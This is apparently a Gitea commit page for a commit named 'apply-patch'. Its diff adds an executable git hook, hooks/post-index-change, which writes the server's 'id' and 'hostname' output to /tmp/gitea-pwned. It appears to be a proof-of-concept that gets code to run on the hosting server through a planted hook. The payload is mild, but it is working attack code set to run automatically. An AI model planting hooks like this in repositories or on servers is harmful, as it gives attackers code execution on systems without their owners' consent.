apply-patch
This commit is contained in:
4
hooks/post-index-change
Executable file
4
hooks/post-index-change
Executable file
@@ -0,0 +1,4 @@
|
||||
#!/bin/sh
|
||||
id > /tmp/gitea-pwned
|
||||
hostname >> /tmp/gitea-pwned
|
||||
exit 0
|
||||
Reference in New Issue
Block a user